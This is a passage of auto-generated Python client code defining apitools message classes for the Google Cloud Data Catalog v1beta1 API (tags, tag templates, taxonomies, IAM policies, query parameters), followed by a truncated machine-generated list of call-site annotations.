""" SEARCH_RESULT_TYPE_UNSPECIFIED = 0 ENTRY = 1 TAG_TEMPLATE = 2 ENTRY_GROUP = 3 linkedResource = _messages.StringField(1) relativeResourceName = _messages.StringField(2) searchResultSubtype = _messages.StringField(3) searchResultType = _messages.EnumField('SearchResultTypeValueValuesEnum', 4) class GoogleCloudDatacatalogV1beta1SerializedPolicyTag(_messages.Message): r"""Message representing one policy tag when exported as a nested proto. Fields: childPolicyTags: Children of the policy tag if any. description: Description of the serialized policy tag. The length of the description is limited to 2000 bytes when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. Display name of the policy tag. Max 200 bytes when encoded in UTF-8. """ childPolicyTags = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedPolicyTag', 1, repeated=True) description = _messages.StringField(2) displayName = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1SerializedTaxonomy(_messages.Message): r"""Message capturing a taxonomy and its policy tag hierarchy as a nested proto. Used for taxonomy import/export and mutation. Fields: description: Description of the serialized taxonomy. The length of the description is limited to 2000 bytes when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. Display name of the taxonomy. Max 200 bytes when encoded in UTF-8. policyTags: Top level policy tags associated with the taxonomy if any. """ description = _messages.StringField(1) displayName = _messages.StringField(2) policyTags = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedPolicyTag', 3, repeated=True) class GoogleCloudDatacatalogV1beta1SystemTimestamps(_messages.Message): r"""Timestamps about this resource according to a particular system. Fields: createTime: The creation time of the resource within the given system. expireTime: Output only. The expiration time of the resource within the given system. Currently only apllicable to BigQuery resources. updateTime: The last-modified time of the resource within the given system. """ createTime = _messages.StringField(1) expireTime = _messages.StringField(2) updateTime = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1TableSpec(_messages.Message): r"""Normal BigQuery table spec. Fields: groupedEntry: Output only. If the table is a dated shard, i.e., with name pattern `[prefix]YYYYMMDD`, `grouped_entry` is the Data Catalog resource name of the date sharded grouped entry, for example, `projects/{project_ id}/locations/{location}/entrygroups/{entry_group_id}/entries/{entry_id} `. Otherwise, `grouped_entry` is empty. """ groupedEntry = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1Tag(_messages.Message): r"""Tags are used to attach custom metadata to Data Catalog resources. Tags conform to the specifications within their tag template. See [Data Catalog IAM](/data-catalog/docs/concepts/iam) for information on the permissions needed to create or view tags. Messages: FieldsValue: Required. This maps the ID of a tag field to the value of and additional information about that field. Valid field IDs are defined by the tag's template. A tag must have at least 1 field and at most 500 fields. Fields: column: Resources like Entry can have schemas associated with them. This scope allows users to attach tags to an individual column based on that schema. For attaching a tag to a nested column, use `.` to separate the column names. 
Example: * `outer_column.inner_column` fields: Required. This maps the ID of a tag field to the value of and additional information about that field. Valid field IDs are defined by the tag's template. A tag must have at least 1 field and at most 500 fields. name: The resource name of the tag in URL format. Example: * projects/{pr oject_id}/locations/{location}/entrygroups/{entry_group_id}/entries/{ent ry_id}/tags/{tag_id} where `tag_id` is a system-generated identifier. Note that this Tag may not actually be stored in the location in this name. template: Required. The resource name of the tag template that this tag uses. Example: * projects/{project_id}/locations/{location}/tagTemplate s/{tag_template_id} This field cannot be modified after creation. templateDisplayName: Output only. The display name of the tag template. """ @encoding.MapUnrecognizedFields('additionalProperties') class FieldsValue(_messages.Message): r"""Required. This maps the ID of a tag field to the value of and additional information about that field. Valid field IDs are defined by the tag's template. A tag must have at least 1 field and at most 500 fields. Messages: AdditionalProperty: An additional property for a FieldsValue object. Fields: additionalProperties: Additional properties of type FieldsValue """ class AdditionalProperty(_messages.Message): r"""An additional property for a FieldsValue object. Fields: key: Name of the additional property. value: A GoogleCloudDatacatalogV1beta1TagField attribute. """ key = _messages.StringField(1) value = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagField', 2) additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True) column = _messages.StringField(1) fields = _messages.MessageField('FieldsValue', 2) name = _messages.StringField(3) template = _messages.StringField(4) templateDisplayName = _messages.StringField(5) class GoogleCloudDatacatalogV1beta1TagField(_messages.Message): r"""Contains the value and supporting information for a field within a Tag. Fields: boolValue: Holds the value for a tag field with boolean type. displayName: Output only. The display name of this field. doubleValue: Holds the value for a tag field with double type. enumValue: Holds the value for a tag field with enum type. This value must be one of the allowed values in the definition of this enum. stringValue: Holds the value for a tag field with string type. timestampValue: Holds the value for a tag field with timestamp type. """ boolValue = _messages.BooleanField(1) displayName = _messages.StringField(2) doubleValue = _messages.FloatField(3) enumValue = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagFieldEnumValue', 4) stringValue = _messages.StringField(5) timestampValue = _messages.StringField(6) class GoogleCloudDatacatalogV1beta1TagFieldEnumValue(_messages.Message): r"""Holds an enum value. Fields: displayName: The display name of the enum value. """ displayName = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1TagTemplate(_messages.Message): r"""A tag template defines a tag, which can have one or more typed fields. The template is used to create and attach the tag to GCP resources. [Tag template roles](/iam/docs/understanding-roles#data-catalog-roles) provide permissions to create, edit, and use the template (see, for example, the [TagTemplate User](/data-catalog/docs/how-to/template-user) role, which includes permission to use the tag template to tag resources. Messages: FieldsValue: Required. 
Map of tag template field IDs to the settings for the field. This map is an exhaustive list of the allowed fields. This map must contain at least one field and at most 500 fields. The keys to this map are tag template field IDs. Field IDs can contain letters (both uppercase and lowercase), numbers (0-9) and underscores (_). Field IDs must be at least 1 character long and at most 64 characters long. Field IDs must start with a letter or underscore. Fields: displayName: The display name for this template. Defaults to an empty string. fields: Required. Map of tag template field IDs to the settings for the field. This map is an exhaustive list of the allowed fields. This map must contain at least one field and at most 500 fields. The keys to this map are tag template field IDs. Field IDs can contain letters (both uppercase and lowercase), numbers (0-9) and underscores (_). Field IDs must be at least 1 character long and at most 64 characters long. Field IDs must start with a letter or underscore. name: The resource name of the tag template in URL format. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } Note that this TagTemplate and its child resources may not actually be stored in the location in this name. """ @encoding.MapUnrecognizedFields('additionalProperties') class FieldsValue(_messages.Message): r"""Required. Map of tag template field IDs to the settings for the field. This map is an exhaustive list of the allowed fields. This map must contain at least one field and at most 500 fields. The keys to this map are tag template field IDs. Field IDs can contain letters (both uppercase and lowercase), numbers (0-9) and underscores (_). Field IDs must be at least 1 character long and at most 64 characters long. Field IDs must start with a letter or underscore. Messages: AdditionalProperty: An additional property for a FieldsValue object. Fields: additionalProperties: Additional properties of type FieldsValue """ class AdditionalProperty(_messages.Message): r"""An additional property for a FieldsValue object. Fields: key: Name of the additional property. value: A GoogleCloudDatacatalogV1beta1TagTemplateField attribute. """ key = _messages.StringField(1) value = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplateField', 2) additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True) displayName = _messages.StringField(1) fields = _messages.MessageField('FieldsValue', 2) name = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1TagTemplateField(_messages.Message): r"""The template for an individual field within a tag template. Fields: displayName: The display name for this field. Defaults to an empty string. isRequired: Whether this is a required field. Defaults to false. name: Output only. The resource name of the tag template field in URL format. Example: * projects/{project_id}/locations/{location}/tagTempla tes/{tag_template}/fields/{field} Note that this TagTemplateField may not actually be stored in the location in this name. type: Required. The type of value this tag field can contain. """ displayName = _messages.StringField(1) isRequired = _messages.BooleanField(2) name = _messages.StringField(3) type = _messages.MessageField('GoogleCloudDatacatalogV1beta1FieldType', 4) class GoogleCloudDatacatalogV1beta1Taxonomy(_messages.Message): r"""A taxonomy is a collection of policy tags that classify data along a common axis. 
For instance a data *sensitivity* taxonomy could contain policy tags denoting PII such as age, zipcode, and SSN. A data *origin* taxonomy could contain policy tags to distinguish user data, employee data, partner data, public data. Enums: ActivatedPolicyTypesValueListEntryValuesEnum: Fields: activatedPolicyTypes: Optional. A list of policy types that are activated for this taxonomy. If not set, defaults to an empty list. description: Optional. Description of this taxonomy. It must: contain only unicode characters, tabs, newlines, carriage returns and page breaks; and be at most 2000 bytes long when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. User defined name of this taxonomy. It must: contain only unicode letters, numbers, underscores, dashes and spaces; not start or end with spaces; and be at most 200 bytes long when encoded in UTF-8. name: Output only. Resource name of this taxonomy, whose format is: "projects/{project_number}/locations/{location_id}/taxonomies/{id}". """ class ActivatedPolicyTypesValueListEntryValuesEnum(_messages.Enum): r"""ActivatedPolicyTypesValueListEntryValuesEnum enum type. Values: POLICY_TYPE_UNSPECIFIED: <no description> FINE_GRAINED_ACCESS_CONTROL: <no description> """ POLICY_TYPE_UNSPECIFIED = 0 FINE_GRAINED_ACCESS_CONTROL = 1 activatedPolicyTypes = _messages.EnumField('ActivatedPolicyTypesValueListEntryValuesEnum', 1, repeated=True) description = _messages.StringField(2) displayName = _messages.StringField(3) name = _messages.StringField(4) class GoogleCloudDatacatalogV1beta1ViewSpec(_messages.Message): r"""Table view specification. Fields: viewQuery: Output only. The query that defines the table view. """ viewQuery = _messages.StringField(1) class Policy(_messages.Message): r"""An Identity and Access Management (IAM) policy, which specifies access controls for Google Cloud resources. A `Policy` is a collection of `bindings`. A `binding` binds one or more `members` to a single `role`. Members can be user accounts, service accounts, Google groups, and domains (such as G Suite). A `role` is a named list of permissions; each `role` can be an IAM predefined role or a user-created custom role. Optionally, a `binding` can specify a `condition`, which is a logical expression that allows access to a resource only if the expression evaluates to `true`. A condition can add constraints based on attributes of the request, the resource, or both. **JSON example:** { "bindings": [ { "role": "roles/resourcemanager.organizationAdmin", "members": [ "user:[email protected]", "group:[email protected]", "domain:google.com", "serviceAccount:my-project- [email protected]" ] }, { "role": "roles/resourcemanager.organizationViewer", "members": ["user:[email protected]"], "condition": { "title": "expirable access", "description": "Does not grant access after Sep 2020", "expression": "request.time < timestamp('2020-10-01T00:00:00.000Z')", } } ], "etag": "BwWWja0YfJA=", "version": 3 } **YAML example:** bindings: - members: - user:[email protected] - group:[email protected] - domain:google.com - serviceAccount :[email protected] role: roles/resourcemanager.organizationAdmin - members: - user:[email protected] role: roles/resourcemanager.organizationViewer condition: title: expirable access description: Does not grant access after Sep 2020 expression: request.time < timestamp('2020-10-01T00:00:00.000Z') - etag: BwWWja0YfJA= - version: 3 For a description of IAM and its features, see the [IAM documentation](https://cloud.google.com/iam/docs/). 
Fields: bindings: Associates a list of `members` to a `role`. Optionally, may specify a `condition` that determines how and when the `bindings` are applied. Each of the `bindings` must contain at least one member. etag: `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other. It is strongly suggested that systems make use of the `etag` in the read- modify-write cycle to perform policy updates in order to avoid race conditions: An `etag` is returned in the response to `getIamPolicy`, and systems are expected to put that etag in the request to `setIamPolicy` to ensure that their change will be applied to the same version of the policy. **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. version: Specifies the format of the policy. Valid values are `0`, `1`, and `3`. Requests that specify an invalid value are rejected. Any operation that affects conditional role bindings must specify version `3`. This requirement applies to the following operations: * Getting a policy that includes a conditional role binding * Adding a conditional role binding to a policy * Changing a conditional role binding in a policy * Removing any role binding, with or without a condition, from a policy that includes conditions **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. If a policy does not include any conditions, operations on that policy may specify any valid version or leave the field unset. """ bindings = _messages.MessageField('Binding', 1, repeated=True) etag = _messages.BytesField(2) version = _messages.IntegerField(3, variant=_messages.Variant.INT32) class SetIamPolicyRequest(_messages.Message): r"""Request message for `SetIamPolicy` method. Fields: policy: REQUIRED: The complete policy to be applied to the `resource`. The size of the policy is limited to a few 10s of KB. An empty policy is a valid policy but certain Cloud Platform services (such as Projects) might reject them. """ policy = _messages.MessageField('Policy', 1) class StandardQueryParameters(_messages.Message): r"""Query parameters accepted by all methods. Enums: FXgafvValueValuesEnum: V1 error format. AltValueValuesEnum: Data format for response. Fields: f__xgafv: V1 error format. access_token: OAuth access token. alt: Data format for response. callback: JSONP fields: Selector specifying which fields to include in a partial response. key: API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. oauth_token: OAuth 2.0 token for the current user. prettyPrint: Returns response with indentations and line breaks. quotaUser: Available to use for quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. trace: A tracing token of the form "token:<tokenid>" to include in api requests. uploadType: Legacy upload protocol for media (e.g. "media", "multipart"). upload_protocol: Upload protocol for media (e.g. "raw", "multipart"). 
""" class AltValueValuesEnum(_messages.Enum): r"""Data format for response. Values: json: Responses with Content-Type of application/json media: Media download with context-dependent Content-Type proto: Responses with Content-Type of application/x-protobuf """ json = 0 media = 1 proto = 2 class FXgafvValueValuesEnum(_messages.Enum): r"""V1 error format. Values: _1: v1 error format _2: v2 error format """ _1 = 0 _2 = 1 f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1) access_token = _messages.StringField(2) alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json') callback = _messages.StringField(4) fields = _messages.StringField(5) key = _messages.StringField(6) oauth_token = _messages.StringField(7) prettyPrint = _messages.BooleanField(8, default=True) quotaUser = _messages.StringField(9) trace = _messages.StringField(10) uploadType = _messages.StringField(11) upload_protocol = _messages.StringField(12) class TestIamPermissionsRequest(_messages.Message): r"""Request message for `TestIamPermissions` method. Fields: permissions: The set of permissions to check for the `resource`. Permissions with wildcards (such as '*' or 'storage.*') are not allowed. For more information see [IAM Overview](https://cloud.google.com/iam/docs/overview#permissions). """ permissions = _messages.StringField(1, repeated=True) class TestIamPermissionsResponse(_messages.Message): r"""Response message for `TestIamPermissions` method. Fields: permissions: A subset of `TestPermissionsRequest.permissions` that the caller is allowed. """ permissions = _messages.StringField(1, repeated=True) encoding.AddCustomJsonFieldMapping( StandardQueryParameters, 'f__xgafv', '$.xgafv') encoding.AddCustomJsonEnumMapping( StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1') encoding.AddCustomJsonEnumMapping( StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
[((1896, 0, 1897, 51), 'apitools.base.py.encoding.AddCustomJsonFieldMapping', 'encoding.AddCustomJsonFieldMapping', ({(1897, 4, 1897, 27): 'StandardQueryParameters', (1897, 29, 1897, 39): '"""f__xgafv"""', (1897, 41, 1897, 50): '"""$.xgafv"""'}, {}), "(StandardQueryParameters, 'f__xgafv',\n '$.xgafv')", False, 'from apitools.base.py import encoding\n'), ((1898, 0, 1899, 61), 'apitools.base.py.encoding.AddCustomJsonEnumMapping', 'encoding.AddCustomJsonEnumMapping', ({(1899, 4, 1899, 49): 'StandardQueryParameters.FXgafvValueValuesEnum', (1899, 51, 1899, 55): '"""_1"""', (1899, 57, 1899, 60): '"""1"""'}, {}), "(StandardQueryParameters.\n FXgafvValueValuesEnum, '_1', '1')", False, 'from apitools.base.py import encoding\n'), ((1900, 0, 1901, 61), 'apitools.base.py.encoding.AddCustomJsonEnumMapping', 'encoding.AddCustomJsonEnumMapping', ({(1901, 4, 1901, 49): 'StandardQueryParameters.FXgafvValueValuesEnum', (1901, 51, 1901, 55): '"""_2"""', (1901, 57, 1901, 60): '"""2"""'}, {}), "(StandardQueryParameters.\n FXgafvValueValuesEnum, '_2', '2')", False, 'from apitools.base.py import encoding\n'), ((57, 14, 57, 47), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(57, 37, 57, 43): '"""Expr"""', (57, 45, 57, 46): '1'}, {}), "('Expr', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((58, 12, 58, 51), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((59, 9, 59, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(59, 31, 59, 32): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((82, 19, 82, 43), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(82, 41, 82, 42): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((83, 16, 83, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(83, 38, 83, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((102, 17, 102, 41), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(102, 39, 102, 40): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((103, 44, 103, 112), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(103, 67, 103, 108): '"""GoogleCloudDatacatalogV1beta1EntryGroup"""', (103, 110, 103, 111): '2'}, {}), "('GoogleCloudDatacatalogV1beta1EntryGroup', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((104, 11, 104, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((117, 10, 117, 35), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(117, 33, 117, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((118, 9, 118, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((135, 12, 135, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(135, 34, 135, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((136, 39, 136, 102), 'apitools.base.protorpclite.messages.MessageField', 
'_messages.MessageField', ({(136, 62, 136, 98): '"""GoogleCloudDatacatalogV1beta1Entry"""', (136, 100, 136, 101): '2'}, {}), "('GoogleCloudDatacatalogV1beta1Entry', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((137, 11, 137, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((148, 9, 148, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((163, 24, 163, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(163, 47, 163, 68): '"""GetIamPolicyRequest"""', (163, 70, 163, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((164, 13, 164, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((179, 9, 179, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((199, 39, 199, 102), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(199, 62, 199, 98): '"""GoogleCloudDatacatalogV1beta1Entry"""', (199, 100, 199, 101): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Entry', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((200, 9, 200, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((201, 15, 201, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(201, 37, 201, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((218, 37, 218, 98), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(218, 60, 218, 94): '"""GoogleCloudDatacatalogV1beta1Tag"""', (218, 96, 218, 97): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Tag', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((219, 11, 219, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((232, 9, 232, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((247, 13, 247, 71), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((248, 14, 248, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(248, 36, 248, 37): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((249, 11, 249, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((268, 37, 268, 98), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(268, 60, 268, 94): '"""GoogleCloudDatacatalogV1beta1Tag"""', (268, 96, 268, 97): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Tag', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((269, 9, 269, 48), 'apitools.base.protorpclite.messages.StringField', 
'_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((270, 15, 270, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(270, 37, 270, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((286, 13, 286, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((287, 30, 287, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(287, 53, 287, 80): '"""TestIamPermissionsRequest"""', (287, 82, 287, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((301, 24, 301, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(301, 47, 301, 68): '"""GetIamPolicyRequest"""', (301, 70, 301, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((302, 13, 302, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((316, 9, 316, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((317, 13, 317, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(317, 35, 317, 36): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((331, 13, 331, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((332, 24, 332, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(332, 47, 332, 68): '"""SetIamPolicyRequest"""', (332, 70, 332, 71): '2'}, {}), "('SetIamPolicyRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((347, 13, 347, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((348, 30, 348, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(348, 53, 348, 80): '"""TestIamPermissionsRequest"""', (348, 82, 348, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((365, 45, 365, 114), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(365, 68, 365, 110): '"""GoogleCloudDatacatalogV1beta1TagTemplate"""', (365, 112, 365, 113): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplate', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((366, 11, 366, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((367, 18, 367, 42), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(367, 40, 367, 41): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((382, 10, 382, 35), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(382, 33, 382, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((383, 9, 383, 48), 
'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((404, 50, 404, 124), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(404, 73, 404, 120): '"""GoogleCloudDatacatalogV1beta1TagTemplateField"""', (404, 122, 404, 123): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplateField', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((405, 11, 405, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((406, 23, 406, 47), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(406, 45, 406, 46): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((421, 10, 421, 35), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(421, 33, 421, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((422, 9, 422, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((445, 50, 445, 124), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(445, 73, 445, 120): '"""GoogleCloudDatacatalogV1beta1TagTemplateField"""', (445, 122, 445, 123): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplateField', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((446, 9, 446, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((447, 15, 447, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(447, 37, 447, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((462, 63, 462, 150), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(462, 86, 462, 146): '"""GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest"""', (462, 148, 462, 149): '1'}, {}), "(\n 'GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((463, 9, 463, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((477, 24, 477, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(477, 47, 477, 68): '"""GetIamPolicyRequest"""', (477, 70, 477, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((478, 13, 478, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((490, 9, 490, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((509, 45, 509, 114), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(509, 68, 509, 110): '"""GoogleCloudDatacatalogV1beta1TagTemplate"""', (509, 112, 509, 113): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplate', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((510, 9, 510, 48), 
'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((511, 15, 511, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(511, 37, 511, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((525, 13, 525, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((526, 24, 526, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(526, 47, 526, 68): '"""SetIamPolicyRequest"""', (526, 70, 526, 71): '2'}, {}), "('SetIamPolicyRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((541, 13, 541, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((542, 30, 542, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(542, 53, 542, 80): '"""TestIamPermissionsRequest"""', (542, 82, 542, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((556, 42, 556, 108), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(556, 65, 556, 104): '"""GoogleCloudDatacatalogV1beta1Taxonomy"""', (556, 106, 556, 107): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Taxonomy', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((557, 11, 557, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((568, 9, 568, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((581, 11, 581, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((582, 25, 582, 50), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(582, 48, 582, 49): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((583, 15, 583, 54), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from 